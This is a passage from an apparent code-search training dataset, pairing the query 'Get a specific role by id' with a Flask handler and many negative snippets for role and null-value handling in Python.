default=encode_object, ensure_ascii=False, separators=(',',':'))\r\n\r\n return super(JSONField, self).get_prep_value(value)", "def filter_is_not_null(self, queryobject):\n raise NotImplementedError()", "def _set_if_not_none(self, field_key, value, verifier=str):\n\n\t\tif value is None:\n\t\t\treturn\n\n\t\tif verifier is not None:\n\t\t\tvalue = verifier(value)\n\n\t\tself.data[field_key] = value", "def temp_validator(cls, value, field):\n if value == \"U\":\n LOGGER.warning(\"{field.name} value is 'U'. Setting to None.\")\n return None\n return value", "def __str__(self):\r\n # If the original value is None, represent this as 'NULL'\r\n if self.original is None:\r\n return 'NULL'\r\n return str(self.original)", "def test_none(self):\n self.assertEqual(self.obj.to_json_string(None), '[]')", "def changenonetoNone(s):\r\n if s=='None':\r\n return None\r\n else:\r\n return s", "def test_nullable_text(self):\r\n entity = NullableTextModel(text=None)\r\n entity.save()\r\n\r\n db_entity = NullableTextModel.objects.get()\r\n self.assertEquals(db_entity.text, None)", "def null() -> SetupVal:\n return NullVal()", "def allow_null_values(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_null_values\")", "def none(self):", "def run(self, value):\r\n return '' if value is None else value", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def _set_None(self):\n\n self.description = None\n self.func = None", "def get_blank(record, field_name, reason=\" in this case.\"):\n val = recordval(record, field_name)\n if val == \"\":\n return \"\"\n else:\n parser_error(\"field \"+field_name+\" must be blank\"+reason)\n return val", "def not_null(value):\n if value is None or value == \"\":\n raise ValidationError(\"The value must not be None\")\n\n return True", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetMarkdownNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def __call__(self, value):\n value = str(value).strip()\n\n if len(value) == 0:\n pass\n\n else:\n super().__call__(value)", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetFunnelNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def check_integrity(dict):\n if (dict['type'] == 'string') and (dict['value'] == None or dict['value'] == ''):\n dict['value'] = '\"\"'", "def quote_or_null(self, val: str, quotes: str = \"'\", null: str = \"NULL\", strings_only = True) -> str:\n if val is None: return null\n if strings_only and isinstance(val, str):\n return f\"{quotes}{val}{quotes}\"\n return val", "def EmptyStringField(**kwargs: Any) -> Any:\n return Field(\"\", **kwargs)", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetBulletNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def nullValueToNan(self) -> None:\n self.cpp.nullValueToNan()", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetBillboardNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def string(self, value):\n # respect {None}\n if value is None:\n # by leaving it alone\n return None\n # my value knows\n return str(value)", "def _validate_on_value(self, value: Any) -> None:\n if not self._is_nullable and value is None:\n msg = \"Non-nullable field cannot have None value\"\n if self._resolve_field_name() is not None:\n msg += f\" (field name = '{self._resolve_field_name()}')\"\n raise FieldValueValidationError(msg)", "def _normalize_argument(self, value):\n return storepass.utils.normalize_empty_to_none(value)", "def str_or_none(val):\n return str(val) if val is not None else None", "def test_field_none_nullable(self):\n node_dict = {\n 'host_name': 'abc'\n }\n try:\n Node(**node_dict)\n except Exception as e:\n self.assertEqual(type(e), ValueError)", "def for_json(self):\n if self.value_is_null:\n return None\n return str(self)", "def leaf_NoneType(self, value, depth, available):\n return \"null\", False", "def null(self):\n val = self.read(4)\n if val != b'null':\n self.on_parser_error(\"null token expected\")\n return null", "def noneToString(text):\n if text in (None, \"\"):\n return \"None\"\n else:\n return str(text)", "def test_update_risk_field_to_null(self, field, field_name):\n risk = factories.RiskFactory()\n\n response = self.api.put(risk, risk.id, {\n field: None,\n })\n\n self.assert400(response)\n self.assertEqual(response.json[\"message\"],\n field_name + \" for the object is not specified\")\n risk = db.session.query(all_models.Risk).get(risk.id)\n self.assertIsNotNone(risk.external_id)", "def test_none(self):\n self.assertEqual(b\"\", self.successResultOf(to_xml(None)))", "def null_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardPageWidgetPyNullValueArgs']]]]:\n return pulumi.get(self, \"null_values\")", "def nonull(val):\n return val if not pd.isnull(val) else None", "def value(self):\r\n v = None\r\n if not self.field.is_readonly() and self.params is not None:\r\n # submitted value. do not deserialize here since that requires\r\n # valid data, which we might not have\r\n try:\r\n v = self._serialized_value()\r\n except formalchemy.fields.FieldNotFoundError, e:\r\n pass\r\n if v:\r\n return v\r\n\r\n return \"\"" ]
[ "0.6952513", "0.69504404", "0.6532988", "0.6294436", "0.6274683", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.62604886", "0.6172854", "0.6107132", "0.6084042", "0.60815674", "0.60674644", "0.6041294", "0.6036508", "0.6013354", "0.598232", "0.59685665", "0.5961358", "0.59434694", "0.58928", "0.58928", "0.58914244", "0.58762866", "0.5868474", "0.58605504", "0.58497256", "0.58497256", "0.58497256", "0.58449465", "0.58443236", "0.5838382", "0.5838114", "0.58210325", "0.57903826", "0.5786105", "0.57771176", "0.5763519", "0.57498974", "0.5747706", "0.5746769", "0.5738825", "0.57366353", "0.5735892", "0.5721641", "0.57176566", "0.5698875", "0.56894505", "0.5681631", "0.56803024", "0.5666041", "0.5651649", "0.5628474", "0.5615261", "0.5615035", "0.56100005", "0.5603432", "0.5580833", "0.55798763", "0.5574009", "0.5562675", "0.5547745", "0.5534809", "0.55301976", "0.5529392", "0.55251324", "0.55032134", "0.54964006", "0.5494551", "0.54909664", "0.54892105", "0.5487989", "0.5471998", "0.54626703", "0.5456147", "0.5446526" ]
0.0
-1
Get a specific role by id
def get(self, uuid): logger.info("Get a specific role by Id", data=uuid) role = Role.query.get(uuid) return role_schema.jsonify(role)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get(self, role_id):\n # Right now the only way is to list them all, then iterate.\n # Perhaps a filter or new endpoint would be useful here.\n roles = self.list()\n for role in roles:\n if role.id == role_id:\n return role\n raise exc.HTTPNotFound()", "def get(self, id):\n return Role.query.filter(Role.id == id).one()", "def get_role_by_id(self, role_id):\n try:\n role = self.db_handler.get_role_by_id(role_id)\n\n self.logger.write_to_log('got role by id', 'model')\n return role\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def get(self, role_id):\n return self.client.get_role(role_id)", "def get_role(self, role_id):\n raise exception.NotImplemented() # pragma: no cover", "async def role_from_id(self, guild: discord.Guild, role_id: int):\n\n return discord.utils.get(guild.roles, id=role_id)", "def get_role(role_id: int) -> Optional[Role]:\n return db.session.query(Role).get(role_id)", "async def get_role(request, role_id):\n conn = await create_connection()\n\n head_block = await utils.get_request_block(request)\n role_resource = await roles_query.fetch_role_resource(conn, role_id)\n conn.close()\n return await utils.create_response(conn, request.url, role_resource, head_block)", "async def fetch(cls, id: Union[str, int]) -> Optional[\"Role\"]:\n query = \"\"\"SELECT * FROM roles WHERE id = $1;\"\"\"\n role = await cls.pool.fetchrow(query, int(id))\n\n if role is not None:\n role = cls(**role)\n\n return role", "def get_role(role_id):\n\tsession = get_session()\n\tresponse = session.get(\"{url}/api/roles/{role_id}\".format(url=get_registry_url(), role_id=role_id))\n\treturn response.json()", "def get_role(self, role_id: int, /) -> Optional[Role]:\n return self.guild.get_role(role_id) if self._roles.has(role_id) else None", "def get(self, id, timeout=None):\n req = RoleGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('Roles.Get', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleGetResponse()\n resp.meta = plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role = plumbing.convert_role_to_porcelain(plumbing_response.role)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_role(role_id):\n\n \"\"\"\n example\n role_id = 3409643000000026005\n \"\"\"\n\n # Get instance of RolesOperations Class\n roles_operations = RolesOperations()\n\n # Call get_role method that takes role_id as parameter\n response = roles_operations.get_role(role_id)\n\n if response is not None:\n\n # Get the status code from response\n print('Status Code: ' + str(response.get_status_code()))\n\n if response.get_status_code() in [204, 304]:\n print('No Content' if response.get_status_code() == 204 else 'Not Modified')\n return\n\n # Get object from response\n response_object = response.get_object()\n\n if response_object is not None:\n\n # Check if expected ResponseWrapper instance is received.\n if isinstance(response_object, ResponseWrapper):\n\n # Get the list of obtained Role instances\n roles_list = response_object.get_roles()\n\n for role in roles_list:\n # Get the DisplayLabel of each Role\n print(\"Role DisplayLabel: \" + role.get_display_label())\n\n # Get the forecastManager User instance of each Role\n forecast_manager = role.get_forecast_manager()\n\n # Check if forecastManager is not None\n if forecast_manager is not None:\n\n # Get the ID of the forecast Manager\n print(\"Role Forecast Manager User-ID: \" + str(forecast_manager.get_id()))\n\n # Get the name of the forecast Manager\n print(\"Role Forecast Manager User-Name: \" + forecast_manager.get_name())\n\n # Get the ShareWithPeers of each Role\n print(\"Role ShareWithPeers: \" + str(role.get_share_with_peers()))\n\n # Get the Name of each Role\n print(\"Role Name: \" + role.get_name())\n\n # Get the Description of each Role\n print(\"Role Description: \" + role.get_description())\n\n # Get the Id of each Role\n print(\"Role ID: \" + str(role.get_id()))\n\n # Get the reporting_to User instance of each Role\n reporting_to = role.get_reporting_to()\n\n # Check if reporting_to is not None\n if reporting_to is not None:\n # Get the ID of the reporting_to User\n print(\"Role ReportingTo User-ID: \" + str(reporting_to.get_id()))\n\n # Get the name of the reporting_to User\n print(\"Role ReportingTo User-Name: \" + reporting_to.get_name())\n\n # Get the AdminUser of each Role\n print(\"Role AdminUser: \" + str(role.get_admin_user()))\n\n # Check if the request returned an exception\n elif isinstance(response_object, APIException):\n # Get the Status\n print(\"Status: \" + response_object.get_status().get_value())\n\n # Get the Code\n print(\"Code: \" + response_object.get_code().get_value())\n\n print(\"Details\")\n\n # Get the details dict\n details = response_object.get_details()\n\n for key, value in details.items():\n print(key + ' : ' + str(value))\n\n # Get the Message\n print(\"Message: \" + response_object.get_message().get_value())", "def get_user_role_by_id(self, user_id):\n try:\n role = self.db_handler.get_user_role_by_id(user_id)\n\n self.logger.write_to_log('got user role information', user_id)\n\n return role\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def get_role(guild: discord.Guild, role_id: int = None, role_name: str = None) -> Optional[discord.Role]:\n if guild is None:\n raise ValueError(\"guild is None\")\n if role_id is None and role_name is None:\n raise ValueError(\"Either role_id or role_name must be specified\")\n for role in guild.roles:\n if role.id == role_id or (role_name is not None and role.name.lower() == role_name.lower()):\n return role\n return None", "def show_keystone_v3_role(self, role_id):\n LOG_OBJ.debug(\"Details of a role.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/roles/\" + str(role_id)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"details of role\")\n print (\"No response from Server while getting the \"\n \"details of role\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Show role Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Show role Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Role details : %s \" % output)\n print (\"Role details : %s \" % output)\n return output['role']", "def get_role(user_id):\n # Get db object and users table\n db = get_db()\n users = db.users\n\n # Check if user_id is a valid user in the users collection\n cursor = users.find({\"user_id\": str(user_id)})\n # if cursor.count() is 0:\n # raise APIException(status_code=404, message='user_id not found')\n # elif cursor.count() > 1:\n # raise APIException(status_code=500, message=\"Error, multiple users with same user_id found, which is not allowed\")\n\n context = {}\n\n if cursor.count() is 0:\n context['role'] = \"\"\n elif cursor.count() > 1:\n raise APIException(status_code=500, message=\"Error, multiple users with same user_id found, which is not allowed\")\n else:\n for document in cursor:\n context['role'] = document['role']\n\n context['url'] = \"/api/v1/role/\" + str(user_id) + \"/\"\n return flask.jsonify(**context)", "def test_get_by_id(self):\n actual = chef_role.get_by_id(self.role_id)\n eq_(actual['chef_role_name'], self.role_name)", "async def role_from_config(self, guild: discord.Guild, iden: str):\n\n id_ = await getattr(self.config.guild(guild), iden)()\n\n return discord.utils.get(guild.roles, id=id_)", "def __find_role (label):\n from data import role as mod\n roles = mod.load ( )\n \n for role in roles.get_all ( ):\n if label == role.label:\n return role\n else:\n raise Exception ('Aplikacija ne pozna vloge: ' + label)", "def getRoleInfo(self, role_id):\n return self._roles[role_id]", "def get(self):\n return self._roles.get(self._id)", "def get_role_id(name: str) -> str:\n response = api.get_roles()\n\n if not response.ok:\n print(response.data)\n sys.exit(1)\n\n for role in response.data.get(\"items\"):\n if role.get(\"name\") == ROLE:\n return role.get(\"id\")\n else:\n return None", "def find_role(self, name):\n return self.get_session.query(self.role_model).filter_by(name=name).one_or_none()", "def get_role(self, name):\n role = Role.query.filter_by(name=name).first()\n\n return role", "def get(self, pk=None, **kwargs):\n if kwargs.pop('include_debug_header', True):\n debug.log('Getting the role record.', header='details')\n data, self.endpoint = self.data_endpoint(kwargs)\n response = self.read(pk=pk, fail_on_no_results=True,\n fail_on_multiple_results=True, **data)\n item_dict = response['results'][0]\n self.configure_display(item_dict)\n return item_dict", "def get_roles(self, principal_id):", "def get_course_access_role(user, org, course_id, role):\n try:\n course_access_role = _CourseAccessRole.objects.get(\n user=user,\n org=org,\n course_id=course_id,\n role=role,\n )\n except _CourseAccessRole.DoesNotExist:\n log.exception('No CourseAccessRole found for user_id=%(user_id)s, org=%(org)s, '\n 'course_id=%(course_id)s, and role=%(role)s.', {\n 'user': user.id,\n 'org': org,\n 'course_id': course_id,\n 'role': role,\n })\n return None\n return course_access_role", "def get(self, id, timeout=None):\n req = RoleGrantGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('RoleGrants.Get', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleGrantGetResponse()\n resp.meta = plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role_grant = plumbing.convert_role_grant_to_porcelain(\n plumbing_response.role_grant)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_role_id(self, role_name):\n _url = \"http://\" + self.host_ip + \":35357/v2.0/OS-KSADM/roles\"\n _body = None\n _headers = {'Content-type': 'application/json',\n 'x-auth-token': self.cloud_admin_info['token_project']}\n response = self.request(\"GET\", _url, _headers, _body)\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting roles.\")\n return response\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get role id for %s Failed with status %s \" %\n response.status)\n return response.status\n output = json.loads(response.data)\n\n for value in output['roles']:\n if value['name'].lower() == role_name.lower():\n LOG_OBJ.debug(\"The role id for role: %s is %s\" % (role_name,\n value['id']))\n return value['id']\n\n LOG_OBJ.error(\"There is NO Role with name: %s\" % role_name)\n return None", "def find_role(self, *args, **kwargs):\n raise NotImplementedError", "def get_role(self, role_name):\n role_record = self.list_roles(('name', role_name))\n if len(role_record) < 1:\n raise Exception('Role \\'%s\\' does not exist.' % role_name)\n return role_record[0]", "def roleDocumentId(self, id: str) -> str:", "def get_keystone_v3_role_id(self, role_name):\n LOG_OBJ.debug(\"Get the role ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/roles?name=\" + \\\n str(role_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of role\")\n print (\"No response from Server while getting the \"\n \"ID of role\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get role ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get role ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"role details : %s \" % output)\n print (\"role details : %s \" % output)\n if len(output['roles']) != 1:\n LOG_OBJ.debug(\"No. of roles with name %s is %s\"\n % (role_name, len(output['roles'])))\n print(\"No. of roles with name %s is %s\"\n % (role_name, len(output['roles'])))\n return\n return output['roles'][0]['id']", "def get_trust_role(self, trust_id, role_id):\n resp, body = self.get(\"OS-TRUST/trusts/%s/roles/%s\"\n % (trust_id, role_id))\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body['role'])", "def get_roles(role):", "def getRole(self, desired=None):\n strDes = str(desired)\n logging.debug(\"[LaymanAuthLiferay][getRole]: '%s'\"%strDes)\n if not self.authorised:\n logging.error(\"[LaymanAuthLiferay][getRole] The user is not authorised\")\n raise AuthError(401, \"I am sorry, but you are not authorised\")\n if self.authJson[\"userInfo\"] and self.authJson[\"userInfo\"][\"roles\"]:\n roles = self.authJson[\"userInfo\"][\"roles\"]\n if len(roles) < 1:\n logging.error(\"[LaymanAuthLiferay][getRole] Cannot determine the workspace - Liferay provided empty list of roles\")\n raise AuthError(500,\"Cannot determine the workspace - Liferay provided empty list of roles\") \n\n theRole = roles[0]\n for r in roles:\n if desired == r[\"roleName\"]:\n theRole = r\n\n #lower and spaces\n #theRole[\"roleName\"] = theRole[\"roleName\"].lower()\n #theRole[\"roleName\"] = \"_\".join(theRole[\"roleName\"].split(' '))\n roleName = theRole[\"roleName\"]\n logging.debug(\"[LaymanAuthLiferay][getRole] The role: '%s'\"% roleName)\n return theRole\n else: \n logging.error(\"[LaymanAuthLiferay][getRole] Cannot determine the workspace - Liferay did not provide user's roles\")\n raise AuthError(500,\"Cannot determine the workspace - Liferay did not provide user's roles\")", "def _get_role(self):\n return self.__role", "async def get_role(self, guild: discord.Guild, create: bool = False, updatedb: bool = True) -> discord.Role | None:\n # Create role if necessary or return None since no role id\n if self.role is None:\n return await self.create_role(guild, updatedb=updatedb) if create else None\n\n # Try to find role in cache\n if not (role := guild.get_role(self.role)):\n return await self.create_role(guild, updatedb=updatedb) if create else None\n return role", "def getRole(self, node):\n info = self.getNode(node, includeDevices=False)\n if info is None:\n self.log.error(\"could not get role because '%s' does not exist\", node)\n return None\n return info.role", "def getRoleInfo(self, role):", "def get_by_id(cls, id):\n return cls.query().get(id)", "def get(self, key: typing.Union[str, int], default: default_var=None) \\\n -> 'typing.Union[role.Role, default_var]':\n if isinstance(key, int):\n return self._roles.get(key, default)\n else:\n return self._get_by_name(key, default=default)", "def find_by_id(self, id_):\n return self.by_id.get(id_)", "def get_role(self):\n return self.role", "def get_role(self, role_name):\n try:\n response = self._client.get_role(RoleName=role_name)\n except Exception as e:\n return False\n\n return response", "def roles(self, role_id, data, tenant_id=None, api_version=\"v2.1\"):\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n cur_ctlr = self._parent_class.controller\n\n url = str(cur_ctlr) + \"/{}/api/tenants/{}/roles/{}\".format(api_version,\n tenant_id,\n role_id)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.rest_call(url, \"put\", data=data)", "def get_course(self, id):\n id = str(id)\n for i in range(len(self.courses)):\n if self.courses[i].id == id:\n return self.courses[i]", "def get(cls, id):\n\n return cls.query.get(id)", "def get(cls, id):\n\n return cls.query.get(id)", "def role_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"role_id\")", "def test_get_by_name(self):\n actual = chef_role.get_by_name(self.role_name)\n eq_(actual['chef_role_id'], self.role_id)", "def get(id):\n return User.query.filter_by(id=id).first()", "def create_partial_role_from_id(role_id, guild_id = 0):\n try:\n return ROLES[role_id]\n except KeyError:\n pass\n \n role = Role._create_empty(role_id, guild_id)\n ROLES[role_id] = role\n \n return role", "def get_role(ssm):\n nodes = ssm[\"nodes\"]\n for node in nodes:\n if node[\"type\"] == \"role\":\n return node[\"name\"]\n return \"no role\"", "def get_employeeRoles(self, id):\n cursor = self.dbconnect.get_cursor()\n cursor.execute('select * from employeeRoles where employee=%s', (id,))\n roles = list()\n for row in cursor:\n roles.append(row[1])\n return roles", "async def get(cls, member: discord.Member, role: discord.Role) -> Optional[\"TempRole\"]:\n data = await config.member(member).get_raw(str(role.id), default=None)\n if data is None:\n return None\n return cls(member, role=role, **data)", "def role_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"role_id\")", "def read_role(self, name, mount_point=DEFAULT_MOUNT_POINT):\n api_path = '/v1/{mount_point}/role/{name}'.format(\n mount_point=mount_point,\n name=name,\n )\n return self._adapter.get(\n url=api_path,\n )", "def get_requested_role(role_id: str, grant_type: str, duration: int = None) -> object:\n duration = 1 if not duration else abs(int(duration))\n start = datetime.datetime.utcnow()\n end = start + datetime.timedelta(hours=duration)\n\n roles = {\n \"PERMANENT\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"PERMANENT\",\n \"grant_start\": None,\n \"grant_end\": None,\n \"floating_length\": None,\n \"explicit\": True,\n },\n \"FLOATING\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"FLOATING\",\n \"grant_start\": None,\n \"grant_end\": None,\n \"floating_length\": duration,\n \"explicit\": True,\n },\n \"TIME_RESTRICTED\": {\n \"id\": role_id,\n \"name\": ROLE,\n \"grant_type\": \"TIME_RESTRICTED\",\n \"grant_start\": start.isoformat() + \"Z\",\n \"grant_end\": end.isoformat() + \"Z\",\n \"floating_length\": 0,\n \"explicit\": True,\n },\n }\n\n if grant_type not in roles:\n print(f\"Invalid grant type {grant_type}. Exiting...\")\n sys.exit(1)\n\n return roles[grant_type]", "def get_cached_role(self):\n cache = self.get_cache()\n if cache.disabled:\n return self\n roles = cache.get(self.ROLES_BY_ID)\n if roles is None or self.id not in roles:\n self.update_cache()\n roles = cache.get(self.ROLES_BY_ID)\n return roles.get(self.id, self)", "def get_role(resource_root, service_name, name, cluster_name=\"default\"):\n return _get_role(resource_root, _get_role_path(cluster_name, service_name, name))", "def get_role_id(args: argparse.Namespace) -> str:\n if args.role_id_json_file:\n if not Utils.is_secure_file(args.role_id_json_file):\n logging.warning(\"Permissions of file '%s' too liberal, consider setting more restrictive permissions\",\n args.role_id_json_file)\n role_id = Utils.extract_value_from_json_file(args.role_id_json_path, args.role_id_json_file)\n logging.info(\"Read role_id '%s' from JSON file '%s'\", role_id, args.role_id_json_file)\n else:\n role_id = args.role_id\n\n return role_id", "def get_user_role(cls, community_id, account_id):\n\n return DB.query_one(\"\"\"SELECT role_id FROM hive_roles\n WHERE community_id = :community_id\n AND account_id = :account_id\n LIMIT 1\"\"\",\n community_id=community_id,\n account_id=account_id) or Role.guest.value", "def role_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"role_id\")", "def show_user_role(instance_id):\n client = get_client()\n\n return client.get_current_user_role(instance_id=instance_id,\n custom_headers=get_custom_headers())", "def parse_role(text, guild = None):\n parsed = ID_RP.fullmatch(text)\n if (parsed is not None):\n role_id = int(parsed.group(1))\n try:\n role = ROLES[role_id]\n except KeyError:\n pass\n else:\n return role\n \n role = parse_role_mention(text)\n if (role is not None):\n return role\n \n if (guild is not None):\n if (guild is not None):\n role = guild.get_role_like(text)\n if (role is not None):\n return role\n \n return None", "def get_user_by_id(self, id):\n\t\treturn self.users.get(id)", "def find_role(self, roleName):\n try:\n return self.role2index[roleName]\n except:\n raise KeyError(\n f\"The role {roleName} is not in the general list... check your input file!\")", "def fusion_api_get_roles(self, uri=None, param='', api=None, headers=None):\n return self.roles.get(uri=uri, api=api, headers=headers, param=param)", "def get_route_by_id(self, route_id):\n route = self.admin_repository.get_route_by_id(route_id)\n if route:\n print('''Route Id: {}\\nRoute: {}\\n\n '''.format(route[0], route[1]))\n return route\n else:\n print(\"Invalid Route Id\")\n return False", "def get_principals(self, role_id):", "def load_user(id):\n return Admin.query.get(int(id))", "def update_role(self, role_id, name: str) -> Role | None:\n role = self.get_session.get(self.role_model, role_id)\n if not role:\n return None\n try:\n role.name = name\n self.get_session.merge(role)\n self.get_session.commit()\n log.info(const.LOGMSG_INF_SEC_UPD_ROLE.format(role))\n except Exception as e:\n log.error(const.LOGMSG_ERR_SEC_UPD_ROLE.format(e))\n self.get_session.rollback()\n return None\n return role", "def get(self, _id):", "def get_by_id(cls, id):\n return db.session.query(cls).get(id)", "def get(self, id):\n resultado = EmployeeModel.query.filter_by(employee_id=id).first()\n if resultado:\n return resultado\n api.abort(404)", "def get(self, id):\n return self.__model__.query.get(id)", "def single_role(self):\n return None", "def role_arn_lookup(session, role_name):\n if session is None:\n return None\n\n client = session.client('iam')\n response = client.get_role(RoleName=role_name)\n if response is None:\n return None\n else:\n return response['Role']['Arn']", "def get(self, id, timeout=None):\n req = RoleAttachmentGetRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Get(\n req,\n metadata=self.parent.get_metadata('RoleAttachments.Get',\n req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleAttachmentGetResponse()\n resp.meta = plumbing.convert_get_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.role_attachment = plumbing.convert_role_attachment_to_porcelain(\n plumbing_response.role_attachment)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def find(self, id):\n response = self._connection.session.get(self.url + \"/%s\" % id)\n return self._raise_or_return_json(response)", "def get_by_id(self, id):\n return self.session.query(User).filter_by(id=id).first()", "def get_movie_roles(movie_id):\n\n cnx,cur = connect_to_db() #get connection with db\n cur.execute(\"SELECT DISTINCT role FROM movie_crew WHERE movie_id = \" + movie_id )\n lst = cur.fetchall()\n cur.close()\n cnx.close()\n return lst", "def get_room_by_id(self, id):\n if not isinstance(id, int):\n id = int(id)\n if self.rooms.has_key(id):\n return self.rooms[id]\n raise RuntimeError, \"Room not known\"", "def get_single_user(self, id):\n for user in self.users:\n if user['id'] == id:\n return user", "def get_by_id(self, id: int):\n\n\t\traise NotImplemented", "def get(self, id):\n return Matstamm.find_by_id(id)", "def _get_role_uuid_by_name(keystone, name):\n\n role_UUID = None\n roles_list = keystone.roles.list()\n\n for role in roles_list:\n if role.name == name:\n role_UUID = role.id\n break\n\n if role_UUID is None:\n raise NameError('Specified role name not found')\n else:\n return role_UUID", "def find_resource(self, id, session):\n return session.query(self.User).filter_by(id=id).first()", "def token_role(self, role):\n return self.read('auth/token/roles/{0}'.format(role))", "def find_roles_by_id(self, role_ids: List[int]) -> List[Role]:\n query = self.get_session.query(Role).filter(Role.id.in_(role_ids))\n return query.all()", "def get(self, id):\n tmp = userDao.get_one_entry(id)\n return tmp", "def get_account_by_id(self, id_):\n return next((account for account in self.accounts\n if account.id == id_), None)", "def getRoles(self):", "def fetch_by_name(profile, name):\n params = {}\n params[\"profile\"] = profile\n response = utils.do_request(role_lib, \"get\", params)\n data = utils.get_data(\"Roles\", response)\n result = [x for x in data if x[\"RoleName\"] == name]\n return result", "def delete(self, id, timeout=None):\n req = RoleDeleteRequest()\n\n req.id = (id)\n tries = 0\n plumbing_response = None\n while True:\n try:\n plumbing_response = self.stub.Delete(\n req,\n metadata=self.parent.get_metadata('Roles.Delete', req),\n timeout=timeout)\n except Exception as e:\n if self.parent.shouldRetry(tries, e):\n tries += 1\n self.parent.jitterSleep(tries)\n continue\n raise plumbing.convert_error_to_porcelain(e) from e\n break\n\n resp = models.RoleDeleteResponse()\n resp.meta = plumbing.convert_delete_response_metadata_to_porcelain(\n plumbing_response.meta)\n resp.rate_limit = plumbing.convert_rate_limit_metadata_to_porcelain(\n plumbing_response.rate_limit)\n return resp", "def get_user(id):\n pass", "def delete_role(id):\r\n check_admin()\r\n\r\n role = Role.query.get_or_404(id)\r\n db.session.delete(role)\r\n db.session.commit()\r\n flash('You have successfully deleted the role.')\r\n\r\n # redirect to the roles page\r\n return redirect(url_for('admin.list_roles'))\r\n\r\n return render_template(title=\"Delete Role\")", "def edit_role(role_id, new_name=None, new_arn=None):\n\tsession = get_session()\n\told_data = get_role(role_id)\n\tdata = {}\n\tdata[\"name\"] = new_name or old_data[\"name\"]\n\tdata[\"arn\"] = new_arn or old_data[\"arn\"]\n\tresponse = 